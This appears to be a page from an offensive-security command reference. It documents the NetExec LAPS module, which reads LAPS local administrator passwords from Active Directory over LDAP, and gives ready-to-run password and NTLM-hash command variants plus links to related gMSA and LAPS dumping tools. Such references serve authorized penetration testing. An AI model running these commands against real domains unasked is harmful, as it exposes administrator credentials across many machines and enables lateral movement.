NetExec LAPS Module (Read ms-MCS-AdmPwd)
Read LAPS-managed local admin passwords from ms-MCS-AdmPwd / msLAPS-Password attributes for every computer the user is permitted to read. Output is a ready-to-use host:user:password list.
- Tool
- nxc
- Category
- Credential Attacks / gMSA & LAPS
- Platform
- linux
- Requires
- password
- Protocols
- LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc ldap <target> -u '<user>' -p '<password>' -M laps
Credential variants
The same attack using a different authentication material.
Hash Auth requires NTLM hash
nxc ldap <target> -u '<user>' -H '<hash>' -M laps
Examples
nxc ldap dc.corp.local -u jdoe -p 'Password123!' -M laps
Tags
References
Related commands
- BloodyAD LAPS Password Read Read LAPS passwords from Active Directory using BloodyAD
- gMSA Password Dump Read password of Group Managed Service Account
- Impacket GetLAPSPassword Retrieve LAPS managed local administrator passwords from Active Directory
- NetExec LDAP gMSA Dump Read Group Managed Service Account passwords via NetExec
- NetExec LDAP LAPS Retrieve LAPS managed local administrator passwords from Active Directory via LDAP